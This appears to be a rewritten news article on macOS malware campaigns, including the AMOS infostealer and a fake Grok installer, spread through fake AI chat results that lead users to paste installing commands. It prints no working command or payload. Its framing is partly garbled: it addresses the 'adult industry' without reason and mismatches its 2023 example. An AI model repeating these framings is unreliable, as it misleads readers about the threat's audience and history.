New macOS malware campaigns are leveraging AI-generated chat results to spread malicious software, including a variant of the Atomic macOS Stealer (AMOS) infostealer. The attacks exploit trust in AI-powered tools and services, using fake conversations to prompt users into running terminal commands that install the malware.

What Happened

Cybersecurity researchers have identified multiple campaigns spreading malicious software on macOS devices through fake AI chat results. In one instance, a Google search for "clear disk space on macOS" yielded an AI conversation result embedded directly in the search results, offering clear instructions and ending with a terminal command that installed AMOS. The malware being spread is Atomic macOS Stealer (AMOS), often referred to as AMOS infostealer.

According to researchers, once the terminal command is executed, the infection chain kicks off immediately. The base64 string in the command decodes into a URL that hosts a malicious bash script. This script is designed to harvest credentials, escalate privileges, and establish persistence without triggering a visible security warning.

Background and Context

The use of AI-generated chat results to spread malware is not new. In 2023, researchers discovered a campaign using sponsored search results and SEO-poisoned links that pointed to fake macOS software hosted on GitHub. The attackers impersonated legitimate apps and walked users through terminal commands that installed the same AMOS infostealer.

Another campaign identified by Mosyle used a fake website posing as the Grok AI app, tricking users into downloading a malicious macOS installer named Grok.dmg. This malware, dubbed SimpleStealth, deployed a Monero cryptocurrency miner built to stay out of sight. Mining activity only began when the Mac had been idle for at least a minute and stopped as soon as the user returned.

Why It Matters to the Industry

The use of AI-generated chat results to spread malware poses significant challenges to cybersecurity professionals in the adult industry. The attacks exploit trust in AI-powered tools and services, making it difficult for users to distinguish between legitimate and malicious conversations. This could lead to a faster cycle of new macOS threats, even if many individual samples remain relatively simple.

The fact that these campaigns have gone undetected by major antivirus engines highlights the need for more sophisticated security measures. The use of AI assistance in malware development is also concerning, as it lowers the technical barrier for attackers and speeds up the development process.

What Comes Next

Cybersecurity professionals in the adult industry must be vigilant in monitoring for these types of attacks. Mosyle advises users to avoid downloading apps from third-party websites, particularly pages that mimic well-known services. Software should only be installed from the Mac App Store or directly from trusted developers using verified domains.

Key Facts

  • The malware being spread is Atomic macOS Stealer (AMOS), often referred to as AMOS infostealer.
  • Fake AI chat results are used to prompt users into running terminal commands that install the malware.
  • The attacks exploit trust in AI-powered tools and services, making it difficult for users to distinguish between legitimate and malicious conversations.
  • Multiple campaigns have been identified, including one using a fake website posing as the Grok AI app.
  • The malware uses base64 strings to decode URLs hosting malicious bash scripts.

Cybersecurity professionals in the adult industry must be aware of these types of attacks and take necessary precautions to protect their users. The use of AI-generated chat results to spread malware is a concerning trend that requires immediate attention.